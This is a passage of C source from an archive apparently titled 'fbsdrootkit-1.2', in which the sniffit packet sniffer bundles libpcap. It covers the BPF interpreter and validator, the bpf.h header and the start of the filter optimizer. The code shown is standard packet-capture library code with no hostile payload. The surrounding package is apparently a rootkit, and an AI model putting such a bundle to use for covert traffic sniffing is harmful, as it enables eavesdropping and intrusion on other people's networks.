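			pc += (A & pc->k) ? pc->jt : pc->jf;
			continue;

		case BPF_JMP|BPF_JGT|BPF_X:
			pc += (A > X) ? pc->jt : pc->jf;
			continue;

		case BPF_JMP|BPF_JGE|BPF_X:
			pc += (A >= X) ? pc->jt : pc->jf;
			continue;

		case BPF_JMP|BPF_JEQ|BPF_X:
			pc += (A == X) ? pc->jt : pc->jf;
			continue;

		case BPF_JMP|BPF_JSET|BPF_X:
			pc += (A & X) ? pc->jt : pc->jf;
			continue;

		case BPF_ALU|BPF_ADD|BPF_X:
			A += X;
			continue;

		case BPF_ALU|BPF_SUB|BPF_X:
			A -= X;
			continue;

		case BPF_ALU|BPF_MUL|BPF_X:
			A *= X;
			continue;

		case BPF_ALU|BPF_DIV|BPF_X:
			if (X == 0)
				return 0;
			A /= X;
			continue;

		case BPF_ALU|BPF_AND|BPF_X:
			A &= X;
			continue;

		case BPF_ALU|BPF_OR|BPF_X:
			A |= X;
			continue;

		case BPF_ALU|BPF_LSH|BPF_X:
			A <<= X;
			continue;

		case BPF_ALU|BPF_RSH|BPF_X:
			A >>= X;
			continue;

		case BPF_ALU|BPF_ADD|BPF_K:
			A += pc->k;
			continue;

		case BPF_ALU|BPF_SUB|BPF_K:
			A -= pc->k;
			continue;

		case BPF_ALU|BPF_MUL|BPF_K:
			A *= pc->k;
			continue;

		case BPF_ALU|BPF_DIV|BPF_K:
			/*
			 * Outside the kernel nothing has validated the
			 * program, so a zero constant must be caught here.
			 */
			if (pc->k == 0)
				return 0;
			A /= pc->k;
			continue;

		case BPF_ALU|BPF_AND|BPF_K:
			A &= pc->k;
			continue;

		case BPF_ALU|BPF_OR|BPF_K:
			A |= pc->k;
			continue;

		case BPF_ALU|BPF_LSH|BPF_K:
			A <<= pc->k;
			continue;

		case BPF_ALU|BPF_RSH|BPF_K:
			A >>= pc->k;
			continue;

		case BPF_ALU|BPF_NEG:
			A = -A;
			continue;

		case BPF_MISC|BPF_TAX:
			X = A;
			continue;

		case BPF_MISC|BPF_TXA:
			A = X;
			continue;
		}
	}
}

#ifdef KERNEL
/*
 * Return true if the 'fcode' is a valid filter program.
 * The constraints are that each jump be forward and to a valid
 * code.  The code must terminate with either an accept or reject.
 * 'f' is the instruction array and 'len' the number of instructions
 * in it; an empty program is rejected.
 *
 * The kernel needs to be able to verify an application's filter code.
 * Otherwise, a bogus program could easily crash the system.
 */
int
bpf_validate(f, len)
	struct bpf_insn *f;
	int len;
{
	register int i;
	register struct bpf_insn *p;

	/* f[len - 1] is examined below, so there must be an instruction. */
	if (len < 1)
		return 0;

	for (i = 0; i < len; ++i) {
		/*
		 * Check that jumps are forward, and within
		 * the code block.
		 */
		p = &f[i];
		if (BPF_CLASS(p->code) == BPF_JMP) {
			register int from = i + 1;

			if (BPF_OP(p->code) == BPF_JA) {
				/*
				 * k is signed: a negative value would be a
				 * backward jump and could loop forever.
				 * Comparing against len - from avoids
				 * overflowing from + k.
				 */
				if (p->k < 0 || p->k >= len - from)
					return 0;
			}
			else if (from + p->jt >= len || from + p->jf >= len)
				return 0;
		}
		/*
		 * Check that memory operations use valid addresses.
		 * This covers stores from A and X and loads into A and X.
		 */
		if ((BPF_CLASS(p->code) == BPF_ST ||
		     BPF_CLASS(p->code) == BPF_STX ||
		     ((BPF_CLASS(p->code) == BPF_LD ||
		       BPF_CLASS(p->code) == BPF_LDX) &&
		      (p->code & 0xe0) == BPF_MEM)) &&
		    (p->k >= BPF_MEMWORDS || p->k < 0))
			return 0;
		/*
		 * Check for constant division by 0.
		 */
		if (p->code == (BPF_ALU|BPF_DIV|BPF_K) && p->k == 0)
			return 0;
	}
	return BPF_CLASS(f[len - 1].code) == BPF_RET;
}
#endif
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/net/bpf.h100600 764 764 17465 6226213210 16404 0ustar dfdf/*-
 * Copyright (c) 1990-1991 The Regents of the University of California.
 * All rights reserved.
 *
 * This code is derived from the Stanford/CMU enet packet filter,
 * (net/enet.c) distributed as part of 4.3BSD, and code contributed
 * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence
 * Berkeley Laboratory.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 * must display the following acknowledgement:
 * This product includes software developed by the University of
 * California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 * may be used to endorse or promote products derived from this software
 * without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.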
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)bpf.h 7.1 (Berkeley) 5/7/91 * * @(#) $Header: bpf.h,v 1.28 93/12/11 00:49:46 mccanne Locked $ (LBL) */ #ifndef BPF_MAJOR_VERSION /* BSD style release date */ #define BPF_RELEASE 199406 #if defined(__alpha) typedef int bpf_int32; typedef u_int bpf_u_int32; #else typedef long bpf_int32; typedef u_long bpf_u_int32; #endif /* * Alignment macros. BPF_WORDALIGN rounds up to the next * even multiple of BPF_ALIGNMENT. */ #define BPF_ALIGNMENT sizeof(long) #define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1)) #define BPF_MAXINSNS 512 #define BPF_MAXBUFSIZE 0x8000 #define BPF_MINBUFSIZE 32 /* * Structure for BIOCSETF. */ struct bpf_program { u_int bf_len; struct bpf_insn *bf_insns; }; /* * Struct returned by BIOCGSTATS. */ struct bpf_stat { u_int bs_recv; /* number of packets received */ u_int bs_drop; /* number of packets dropped */ }; /* * Struct return by BIOCVERSION. This represents the version number of * the filter language described by the instruction encodings below. * bpf understands a program iff kernel_major == filter_major && * kernel_minor >= filter_minor, that is, if the value returned by the * running kernel has the same major number and a minor number equal * equal to or less than the filter being downloaded. Otherwise, the * results are undefined, meaning an error may be returned or packets * may be accepted haphazardly. * It has nothing to do with the source code version. 
*/ struct bpf_version { u_short bv_major; u_short bv_minor; }; /* Current version number of filter architecture. */ #define BPF_MAJOR_VERSION 1 #define BPF_MINOR_VERSION 1 /* * BPF ioctls * * The first set is for compatibility with Sun's pcc style * header files. If your using gcc, we assume that you * have run fixincludes so the latter set should work. */ #if (defined(sun) || defined(ibm032)) && !defined(__GNUC__) #define BIOCGBLEN _IOR(B,102, u_int) #define BIOCSBLEN _IOWR(B,102, u_int) #define BIOCSETF _IOW(B,103, struct bpf_program) #define BIOCFLUSH _IO(B,104) #define BIOCPROMISC _IO(B,105) #define BIOCGDLT _IOR(B,106, u_int) #define BIOCGETIF _IOR(B,107, struct ifreq) #define BIOCSETIF _IOW(B,108, struct ifreq) #define BIOCSRTIMEOUT _IOW(B,109, struct timeval) #define BIOCGRTIMEOUT _IOR(B,110, struct timeval) #define BIOCGSTATS _IOR(B,111, struct bpf_stat) #define BIOCIMMEDIATE _IOW(B,112, u_int) #define BIOCVERSION _IOR(B,113, struct bpf_version) #else #define BIOCGBLEN _IOR('B',102, u_int) #define BIOCSBLEN _IOWR('B',102, u_int) #define BIOCSETF _IOW('B',103, struct bpf_program) #define BIOCFLUSH _IO('B',104) #define BIOCPROMISC _IO('B',105) #define BIOCGDLT _IOR('B',106, u_int) #define BIOCGETIF _IOR('B',107, struct ifreq) #define BIOCSETIF _IOW('B',108, struct ifreq) #define BIOCSRTIMEOUT _IOW('B',109, struct timeval) #define BIOCGRTIMEOUT _IOR('B',110, struct timeval) #define BIOCGSTATS _IOR('B',111, struct bpf_stat) #define BIOCIMMEDIATE _IOW('B',112, u_int) #define BIOCVERSION _IOR('B',113, struct bpf_version) #endif /* * Structure prepended to each packet. 
*/ struct bpf_hdr { struct timeval bh_tstamp; /* time stamp */ bpf_u_int32 bh_caplen; /* length of captured portion */ bpf_u_int32 bh_datalen; /* original length of packet */ u_short bh_hdrlen; /* length of bpf header (this struct plus alignment padding) */ }; /* * Because the structure above is not a multiple of 4 bytes, some compilers * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work. * Only the kernel needs to know about it; applications use bh_hdrlen. */ #ifdef KERNEL #define SIZEOF_BPF_HDR 18 #endif /* * Data-link level type codes. */ #define DLT_NULL 0 /* no link-layer encapsulation */ #define DLT_EN10MB 1 /* Ethernet (10Mb) */ #define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */ #define DLT_AX25 3 /* Amateur Radio AX.25 */ #define DLT_PRONET 4 /* Proteon ProNET Token Ring */ #define DLT_CHAOS 5 /* Chaos */ #define DLT_IEEE802 6 /* IEEE 802 Networks */ #define DLT_ARCNET 7 /* ARCNET */ #define DLT_SLIP 8 /* Serial Line IP */ #define DLT_PPP 9 /* Point-to-point Protocol */ #define DLT_FDDI 10 /* FDDI */ /* * The instruction encondings. 
*/ /* instruction classes */ #define BPF_CLASS(code) ((code) & 0x07) #define BPF_LD 0x00 #define BPF_LDX 0x01 #define BPF_ST 0x02 #define BPF_STX 0x03 #define BPF_ALU 0x04 #define BPF_JMP 0x05 #define BPF_RET 0x06 #define BPF_MISC 0x07 /* ld/ldx fields */ #define BPF_SIZE(code) ((code) & 0x18) #define BPF_W 0x00 #define BPF_H 0x08 #define BPF_B 0x10 #define BPF_MODE(code) ((code) & 0xe0) #define BPF_IMM 0x00 #define BPF_ABS 0x20 #define BPF_IND 0x40 #define BPF_MEM 0x60 #define BPF_LEN 0x80 #define BPF_MSH 0xa0 /* alu/jmp fields */ #define BPF_OP(code) ((code) & 0xf0) #define BPF_ADD 0x00 #define BPF_SUB 0x10 #define BPF_MUL 0x20 #define BPF_DIV 0x30 #define BPF_OR 0x40 #define BPF_AND 0x50 #define BPF_LSH 0x60 #define BPF_RSH 0x70 #define BPF_NEG 0x80 #define BPF_JA 0x00 #define BPF_JEQ 0x10 #define BPF_JGT 0x20 #define BPF_JGE 0x30 #define BPF_JSET 0x40 #define BPF_SRC(code) ((code) & 0x08) #define BPF_K 0x00 #define BPF_X 0x08 /* ret - BPF_K and BPF_X also apply */ #define BPF_RVAL(code) ((code) & 0x18) #define BPF_A 0x10 /* misc */ #define BPF_MISCOP(code) ((code) & 0xf8) #define BPF_TAX 0x00 #define BPF_TXA 0x80 /* * The instruction data structure. */ struct bpf_insn { u_short code; u_char jt; u_char jf; bpf_int32 k; }; /* * Macros for insn array initializers. */ #define BPF_STMT(code, k) { (u_short)(code), 0, 0, k } #define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k } #ifdef KERNEL extern u_int bpf_filter(); extern void bpfattach(); extern void bpf_tap(); extern void bpf_mtap(); #endif /* * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST). */ #define BPF_MEMWORDS 16 #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/optimize.c100400 764 764 113451 6226213210 16710 0ustar dfdf/* * Copyright (c) 1988, 1989, 1990, 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. 
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * Optimization module for tcpdump intermediate representation. */ #ifndef lint static char rcsid[] = "@(#) $Header: optimize.c,v 1.45 94/06/20 19:07:55 leres Exp $ (LBL)"; #endif #include #include #include #include #ifdef __osf__ #include #include #endif #include #include "gencode.h" #ifndef __GNUC__ #define inline #endif #define A_ATOM BPF_MEMWORDS #define X_ATOM (BPF_MEMWORDS+1) #define NOP -1 /* * This define is used to represent *both* the accumulator and * x register in use-def computations. * Currently, the use-def code assumes only one definition per instruction. */ #define AX_ATOM N_ATOMS /* * A flag to indicate that further optimization is needed. * Iterative passes are continued until a given pass yields no * branch movement. */ static int done; /* * A block is marked if only if its mark equals the current mark. * Rather than traverse the code array, marking each item, 'cur_mark' is * incremented. 
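This automatically makes each element unmarked.
 */
static int cur_mark;
#define isMarked(p) ((p)->mark == cur_mark)
#define unMarkAll() cur_mark += 1
#define Mark(p) ((p)->mark = cur_mark)

static void opt_init(struct block *);
static void opt_cleanup(void);

static void make_marks(struct block *);
static void mark_code(struct block *);

static void intern_blocks(struct block *);

static int eq_slist(struct slist *, struct slist *);

static void find_levels_r(struct block *);

static void find_levels(struct block *);
static void find_dom(struct block *);
static void propedom(struct edge *);
static void find_edom(struct block *);
static void find_closure(struct block *);
static int atomuse(struct stmt *);
static int atomdef(struct stmt *);
static void compute_local_ud(struct block *);
static void find_ud(struct block *);
static void init_val(void);
static long F(int, long, long);
static inline void vstore(struct stmt *, long *, long, int);
static void opt_blk(struct block *, int);
static int use_conflict(struct block *, struct block *);
static void opt_j(struct edge *);
static void or_pullup(struct block *);
static void and_pullup(struct block *);
static void opt_blks(struct block *, int);
static inline void link_inedge(struct edge *, struct block *);
static void find_inedges(struct block *);
static void opt_root(struct block **);
static void opt_loop(struct block *, int);
static void fold_op(struct stmt *, long, long);
static inline struct slist *this_op(struct slist *);
static void opt_not(struct block *);
static void opt_peep(struct block *);
static void opt_stmt(struct stmt *, long[], int);
static void deadstmt(struct stmt *, struct stmt *[]);
static void opt_deadstores(struct block *);
static void opt_blk(struct block *, int);
static int use_conflict(struct block *, struct block *);
static void opt_j(struct edge *);
static struct block *fold_edge(struct block *, struct edge *);
static inline int eq_blk(struct block *, struct block *);
static int slength(struct slist *);
static int count_blocks(struct block *);
static void number_blks_r(struct block *);
static int count_stmts(struct block *);
static void convert_code_r(struct block *);

static int n_blocks;
struct block **blocks;
static int n_edges;
struct edge **edges;

/*
 * A bit vector set representation of the dominators.
 * We round up the set size to the next power of two.
 */
static int nodewords;
static int edgewords;
struct block **levels;
u_long *space;
#define BITS_PER_WORD (8*sizeof(u_long))

/*
 * The single-bit masks below are built from (u_long)1 rather than a
 * plain int 1: the bit index ranges over a whole u_long word, and
 * shifting an int by that many positions is undefined wherever u_long
 * is wider than int (and for the top bit even where it is not).
 */

/*
 * True if a is in uset {p}
 */
#define SET_MEMBER(p, a) \
((p)[(unsigned)(a) / BITS_PER_WORD] & ((u_long)1 << ((unsigned)(a) % BITS_PER_WORD)))

/*
 * Add 'a' to uset p.
 */
#define SET_INSERT(p, a) \
(p)[(unsigned)(a) / BITS_PER_WORD] |= ((u_long)1 << ((unsigned)(a) % BITS_PER_WORD))

/*
 * Delete 'a' from uset p.
 */
#define SET_DELETE(p, a) \
(p)[(unsigned)(a) / BITS_PER_WORD] &= ~((u_long)1 << ((unsigned)(a) % BITS_PER_WORD))

/*
 * a := a intersect b
 */
#define SET_INTERSECT(a, b, n)\
{\
	register u_long *_x = a, *_y = b;\
	register int _n = n;\
	while (--_n >= 0) *_x++ &= *_y++;\
}

/*
 * a := a - b
 */
#define SET_SUBTRACT(a, b, n)\
{\
	register u_long *_x = a, *_y = b;\
	register int _n = n;\
	while (--_n >= 0) *_x++ &=~ *_y++;\
}

/*
 * a := a union b
 */
#define SET_UNION(a, b, n)\
{\
	register u_long *_x = a, *_y = b;\
	register int _n = n;\
	while (--_n >= 0) *_x++ |= *_y++;\
}

static uset all_dom_sets;
static uset all_closure_sets;
static uset all_edge_sets;

#ifndef MAX
#define MAX(a,b) ((a)>(b)?(a):(b))
#endif

/*
 * Recursive worker for find_levels(): assign b its level and push it
 * on the front of the list for that level.  A block with no true
 * branch gets level 0; any other block gets one more than the higher
 * of its two successors.  Blocks already marked in this pass are
 * skipped, so each block is placed once.
 */
static void
find_levels_r(b)
	struct block *b;
{
	int level;

	if (isMarked(b))
		return;

	Mark(b);
	b->link = 0;

	if (JT(b)) {
		/* Successors first, so their levels are known. */
		find_levels_r(JT(b));
		find_levels_r(JF(b));
		level = MAX(JT(b)->level, JF(b)->level) + 1;
	} else
		level = 0;
	b->level = level;
	b->link = levels[level];
	levels[level] = b;
}

/*
 * Level graph. The levels go from 0 at the leaves to
 * N_LEVELS at the root. The levels[] array points to the
 * first node of the level list, whose elements are linked
 * with the 'link' field of the struct block.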
*/ static void find_levels(root) struct block *root; { memset((char *)levels, 0, n_blocks * sizeof(*levels)); unMarkAll(); find_levels_r(root); } /* * Find dominator relationships. * Assumes graph has been leveled. */ static void find_dom(root) struct block *root; { int i; struct block *b; u_long *x; /* * Initialize sets to contain all nodes. */ x = all_dom_sets; i = n_blocks * nodewords; while (--i >= 0) *x++ = ~0; /* Root starts off empty. */ for (i = nodewords; --i >= 0;) root->dom[i] = 0; /* root->level is the highest level no found. */ for (i = root->level; i >= 0; --i) { for (b = levels[i]; b; b = b->link) { SET_INSERT(b->dom, b->id); if (JT(b) == 0) continue; SET_INTERSECT(JT(b)->dom, b->dom, nodewords); SET_INTERSECT(JF(b)->dom, b->dom, nodewords); } } } static void propedom(ep) struct edge *ep; { SET_INSERT(ep->edom, ep->id); if (ep->succ) { SET_INTERSECT(ep->succ->et.edom, ep->edom, edgewords); SET_INTERSECT(ep->succ->ef.edom, ep->edom, edgewords); } } /* * Compute edge dominators. * Assumes graph has been leveled and predecessors established. */ static void find_edom(root) struct block *root; { int i; uset x; struct block *b; x = all_edge_sets; for (i = n_edges * edgewords; --i >= 0; ) x[i] = ~0; /* root->level is the highest level no found. */ memset(root->et.edom, 0, edgewords * sizeof(*(uset)0)); memset(root->ef.edom, 0, edgewords * sizeof(*(uset)0)); for (i = root->level; i >= 0; --i) { for (b = levels[i]; b != 0; b = b->link) { propedom(&b->et); propedom(&b->ef); } } } /* * Find the backwards transitive closure of the flow graph. These sets * are backwards in the sense that we find the set of nodes that reach * a given node, not the set of nodes that can be reached by a node. * * Assumes graph has been leveled. */ static void find_closure(root) struct block *root; { int i; struct block *b; /* * Initialize sets to contain no nodes. 
*/ memset((char *)all_closure_sets, 0, n_blocks * nodewords * sizeof(*all_closure_sets)); /* root->level is the highest level no found. */ for (i = root->level; i >= 0; --i) { for (b = levels[i]; b; b = b->link) { SET_INSERT(b->closure, b->id); if (JT(b) == 0) continue; SET_UNION(JT(b)->closure, b->closure, nodewords); SET_UNION(JF(b)->closure, b->closure, nodewords); } } } /* * Return the register number that is used by s. If A and X are both * used, return AX_ATOM. If no register is used, return -1. * * The implementation should probably change to an array access. */ static int atomuse(s) struct stmt *s; { register int c = s->code; if (c == NOP) return -1; switch (BPF_CLASS(c)) { case BPF_RET: return (BPF_RVAL(c) == BPF_A) ? A_ATOM : (BPF_RVAL(c) == BPF_X) ? X_ATOM : -1; case BPF_LD: case BPF_LDX: return (BPF_MODE(c) == BPF_IND) ? X_ATOM : (BPF_MODE(c) == BPF_MEM) ? s->k : -1; case BPF_ST: return A_ATOM; case BPF_STX: return X_ATOM; case BPF_JMP: case BPF_ALU: if (BPF_SRC(c) == BPF_X) return AX_ATOM; return A_ATOM; case BPF_MISC: return BPF_MISCOP(c) == BPF_TXA ? X_ATOM : A_ATOM; } abort(); /* NOTREACHED */ } /* * Return the register number that is defined by 's'. We assume that * a single stmt cannot define more than one register. If no register * is defined, return -1. * * The implementation should probably change to an array access. */ static int atomdef(s) struct stmt *s; { if (s->code == NOP) return -1; switch (BPF_CLASS(s->code)) { case BPF_LD: case BPF_ALU: return A_ATOM; case BPF_LDX: return X_ATOM; case BPF_ST: case BPF_STX: return s->k; case BPF_MISC: return BPF_MISCOP(s->code) == BPF_TAX ? 
X_ATOM : A_ATOM; } return -1; } static void compute_local_ud(b) struct block *b; { struct slist *s; atomset def = 0, use = 0, kill = 0; int atom; for (s = b->stmts; s; s = s->next) { if (s->s.code == NOP) continue; atom = atomuse(&s->s); if (atom >= 0) { if (atom == AX_ATOM) { if (!ATOMELEM(def, X_ATOM)) use |= ATOMMASK(X_ATOM); if (!ATOMELEM(def, A_ATOM)) use |= ATOMMASK(A_ATOM); } else if (atom < N_ATOMS) { if (!ATOMELEM(def, atom)) use |= ATOMMASK(atom); } else abort(); } atom = atomdef(&s->s); if (atom >= 0) { if (!ATOMELEM(use, atom)) kill |= ATOMMASK(atom); def |= ATOMMASK(atom); } } if (!ATOMELEM(def, A_ATOM) && BPF_CLASS(b->s.code) == BPF_JMP) use |= ATOMMASK(A_ATOM); b->def = def; b->kill = kill; b->in_use = use; } /* * Assume graph is already leveled. */ static void find_ud(root) struct block *root; { int i, maxlevel; struct block *p; /* * root->level is the highest level no found; * count down from there. */ maxlevel = root->level; for (i = maxlevel; i >= 0; --i) for (p = levels[i]; p; p = p->link) { compute_local_ud(p); p->out_use = 0; } for (i = 1; i <= maxlevel; ++i) { for (p = levels[i]; p; p = p->link) { p->out_use |= JT(p)->in_use | JF(p)->in_use; p->in_use |= p->out_use &~ p->kill; } } } /* * These data structures are used in a Cocke and Shwarz style * value numbering scheme. Since the flowgraph is acyclic, * exit values can be propagated from a node's predecessors * provided it is uniquely defined. */ struct valnode { int code; long v0, v1; long val; struct valnode *next; }; #define MODULUS 213 static struct valnode *hashtbl[MODULUS]; static int curval; static int maxval; /* Integer constants mapped with the load immediate opcode. 
*/ #define K(i) F(BPF_LD|BPF_IMM|BPF_W, i, 0L) struct vmapinfo { int is_const; long const_val; }; struct vmapinfo *vmap; struct valnode *vnode_base; struct valnode *next_vnode; static void init_val() { curval = 0; next_vnode = vnode_base; memset((char *)vmap, 0, maxval * sizeof(*vmap)); memset((char *)hashtbl, 0, sizeof hashtbl); } /* Because we really don't have an IR, this stuff is a little messy. */ static long F(code, v0, v1) int code; long v0, v1; { u_int hash; int val; struct valnode *p; hash = (u_int)code ^ (v0 << 4) ^ (v1 << 8); hash %= MODULUS; for (p = hashtbl[hash]; p; p = p->next) if (p->code == code && p->v0 == v0 && p->v1 == v1) return p->val; val = ++curval; if (BPF_MODE(code) == BPF_IMM && (BPF_CLASS(code) == BPF_LD || BPF_CLASS(code) == BPF_LDX)) { vmap[val].const_val = v0; vmap[val].is_const = 1; } p = next_vnode++; p->val = val; p->code = code; p->v0 = v0; p->v1 = v1; p->next = hashtbl[hash]; hashtbl[hash] = p; return val; } static inline void vstore(s, valp, newval, alter) struct stmt *s; long *valp; long newval; int alter; { if (alter && *valp == newval) s->code = NOP; else *valp = newval; } static void fold_op(s, v0, v1) struct stmt *s; long v0, v1; { long a, b; a = vmap[v0].const_val; b = vmap[v1].const_val; switch (BPF_OP(s->code)) { case BPF_ADD: a += b; break; case BPF_SUB: a -= b; break; case BPF_MUL: a *= b; break; case BPF_DIV: if (b == 0) bpf_error("division by zero"); a /= b; break; case BPF_AND: a &= b; break; case BPF_OR: a |= b; break; case BPF_LSH: a <<= b; break; case BPF_RSH: a >>= b; break; case BPF_NEG: a = -a; break; default: abort(); } s->k = a; s->code = BPF_LD|BPF_IMM; done = 0; } static inline struct slist * this_op(s) struct slist *s; { while (s != 0 && s->s.code == NOP) s = s->next; return s; } static void opt_not(b) struct block *b; { struct block *tmp = JT(b); JT(b) = JF(b); JF(b) = tmp; } static void opt_peep(b) struct block *b; { struct slist *s; struct slist *next, *last; int val; long v; s = b->stmts; if (s == 0) 
return; last = s; while (1) { s = this_op(s); if (s == 0) break; next = this_op(s->next); if (next == 0) break; last = next; /* * st M[k] --> st M[k] * ldx M[k] tax */ if (s->s.code == BPF_ST && next->s.code == (BPF_LDX|BPF_MEM) && s->s.k == next->s.k) { done = 0; next->s.code = BPF_MISC|BPF_TAX; } /* * ld #k --> ldx #k * tax txa */ if (s->s.code == (BPF_LD|BPF_IMM) && next->s.code == (BPF_MISC|BPF_TAX)) { s->s.code = BPF_LDX|BPF_IMM; next->s.code = BPF_MISC|BPF_TXA; done = 0; } /* * This is an ugly special case, but it happens * when you say tcp[k] or udp[k] where k is a constant. */ if (s->s.code == (BPF_LD|BPF_IMM)) { struct slist *add, *tax, *ild; /* * Check that X isn't used on exit from this * block (which the optimizer might cause). * We know the code generator won't generate * any local dependencies. */ if (ATOMELEM(b->out_use, X_ATOM)) break; if (next->s.code != (BPF_LDX|BPF_MSH|BPF_B)) add = next; else add = this_op(next->next); if (add == 0 || add->s.code != (BPF_ALU|BPF_ADD|BPF_X)) break; tax = this_op(add->next); if (tax == 0 || tax->s.code != (BPF_MISC|BPF_TAX)) break; ild = this_op(tax->next); if (ild == 0 || BPF_CLASS(ild->s.code) != BPF_LD || BPF_MODE(ild->s.code) != BPF_IND) break; /* * XXX We need to check that X is not * subsequently used. We know we can eliminate the * accumulator modifications since it is defined * by the last stmt of this sequence. * * We want to turn this sequence: * * (004) ldi #0x2 {s} * (005) ldxms [14] {next} -- optional * (006) addx {add} * (007) tax {tax} * (008) ild [x+0] {ild} * * into this sequence: * * (004) nop * (005) ldxms [14] * (006) nop * (007) nop * (008) ild [x+2] * */ ild->s.k += s->s.k; s->s.code = NOP; add->s.code = NOP; tax->s.code = NOP; done = 0; } s = next; } /* * If we have a subtract to do a comparison, and the X register * is a known constant, we can merge this value into the * comparison. 
*/ if (last->s.code == (BPF_ALU|BPF_SUB|BPF_X) && !ATOMELEM(b->out_use, A_ATOM)) { val = b->val[X_ATOM]; if (vmap[val].is_const) { b->s.k += vmap[val].const_val; last->s.code = NOP; done = 0; } else if (b->s.k == 0) { /* * sub x -> nop * j #0 j x */ last->s.code = NOP; b->s.code = BPF_CLASS(b->s.code) | BPF_OP(b->s.code) | BPF_X; done = 0; } } /* * Likewise, a constant subtract can be simplified. */ else if (last->s.code == (BPF_ALU|BPF_SUB|BPF_K) && !ATOMELEM(b->out_use, A_ATOM)) { b->s.k += last->s.k; last->s.code = NOP; done = 0; } /* * and #k nop * jeq #0 -> jset #k */ if (last->s.code == (BPF_ALU|BPF_AND|BPF_K) && !ATOMELEM(b->out_use, A_ATOM) && b->s.k == 0) { b->s.k = last->s.k; b->s.code = BPF_JMP|BPF_K|BPF_JSET; last->s.code = NOP; done = 0; opt_not(b); } /* * If the accumulator is a known constant, we can compute the * comparison result. */ val = b->val[A_ATOM]; if (vmap[val].is_const && BPF_SRC(b->s.code) == BPF_K) { v = vmap[val].const_val; switch (BPF_OP(b->s.code)) { case BPF_JEQ: v = v == b->s.k; break; case BPF_JGT: v = v > b->s.k; break; case BPF_JGE: v = v >= b->s.k; break; case BPF_JSET: v &= b->s.k; break; default: abort(); } if (JF(b) != JT(b)) done = 0; if (v) JF(b) = JT(b); else JT(b) = JF(b); } } /* * Compute the symbolic value of expression of 's', and update * anything it defines in the value table 'val'. If 'alter' is true, * do various optimizations. This code would be cleaner if symbolic * evaluation and code transformations weren't folded together. 
*/ static void opt_stmt(s, val, alter) struct stmt *s; long val[]; int alter; { int op; long v; switch (s->code) { case BPF_LD|BPF_ABS|BPF_W: case BPF_LD|BPF_ABS|BPF_H: case BPF_LD|BPF_ABS|BPF_B: v = F(s->code, s->k, 0L); vstore(s, &val[A_ATOM], v, alter); break; case BPF_LD|BPF_IND|BPF_W: case BPF_LD|BPF_IND|BPF_H: case BPF_LD|BPF_IND|BPF_B: v = val[X_ATOM]; if (alter && vmap[v].is_const) { s->code = BPF_LD|BPF_ABS|BPF_SIZE(s->code); s->k += vmap[v].const_val; v = F(s->code, s->k, 0L); done = 0; } else v = F(s->code, s->k, v); vstore(s, &val[A_ATOM], v, alter); break; case BPF_LD|BPF_LEN: v = F(s->code, 0L, 0L); vstore(s, &val[A_ATOM], v, alter); break; case BPF_LD|BPF_IMM: v = K(s->k); vstore(s, &val[A_ATOM], v, alter); break; case BPF_LDX|BPF_IMM: v = K(s->k); vstore(s, &val[X_ATOM], v, alter); break; case BPF_LDX|BPF_MSH|BPF_B: v = F(s->code, s->k, 0L); vstore(s, &val[X_ATOM], v, alter); break; case BPF_ALU|BPF_NEG: if (alter && vmap[val[A_ATOM]].is_const) { s->code = BPF_LD|BPF_IMM; s->k = -vmap[val[A_ATOM]].const_val; val[A_ATOM] = K(s->k); } else val[A_ATOM] = F(s->code, val[A_ATOM], 0L); break; case BPF_ALU|BPF_ADD|BPF_K: case BPF_ALU|BPF_SUB|BPF_K: case BPF_ALU|BPF_MUL|BPF_K: case BPF_ALU|BPF_DIV|BPF_K: case BPF_ALU|BPF_AND|BPF_K: case BPF_ALU|BPF_OR|BPF_K: case BPF_ALU|BPF_LSH|BPF_K: case BPF_ALU|BPF_RSH|BPF_K: op = BPF_OP(s->code); if (alter) { if (s->k == 0) { if (op == BPF_ADD || op == BPF_SUB || op == BPF_LSH || op == BPF_RSH || op == BPF_OR) { 